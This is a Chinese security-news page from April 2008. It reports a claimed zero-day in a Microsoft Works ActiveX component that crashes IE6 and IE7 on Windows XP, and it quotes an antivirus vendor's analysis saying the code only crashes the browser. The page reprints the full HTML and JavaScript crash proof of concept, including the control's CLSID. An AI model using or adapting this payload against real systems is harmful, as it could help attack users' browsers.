RSS
热门关键字:  江民 病毒库  kv2007  瑞星  江民  kv2008
当前位置 :| 主页>业界资讯>病毒播报>

Windows组件0Day漏洞 通杀IE6与IE7浏览器

来源: 作者: 时间:2008-04-21 Tag:漏洞   xp   ie   点击:

  近日,有计算机用户反映了一个Windows 0Day漏洞,并出了相关代码:

  [0day]Microsoft Works 7 WkImgSrv.dll crash POC,dll版本7.03.0616.0,IE7+Windows XP SP2 测试通过。

  [html]

  [head]

  [title]Microsoft Works 7 WkImgSrv.dll crash POC[/title]

  [script language=”JavaScript”]

  function payload() {

  var num = -1;

  obj.WksPictureInterface = num;

  }

  [/script]

  [/head]

  [body onload=”JavaScript: return payload();”]

  [object classid=”clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6″ id=”obj”]

  [/object]

  [/body]

  [/html]

  金山毒霸研发中心分析如下:

  近几天网络上流传着一个传说为IE 0DAY的POC代码,在Windows XP系统环境下通杀了IE6和IE7,其它系统并未经过测试。其实这个漏洞并不是存在于IE,而是Microsoft Works的组件被挖掘出漏洞,部分的Windows XP预装了Microsoft Works,所以就出现了过全补丁系统的漏洞(如华硕易PC 就预装了Microsoft Works)。这段攻击代码会让浏览器崩溃,目前尚不能因此传播恶意软件。


最新评论共有 0 位网友发表了评论
发表评论
评论内容:不能超过250字,需审核,请自觉遵守互联网相关政策法规。
用户名: 密码:
匿名?
注册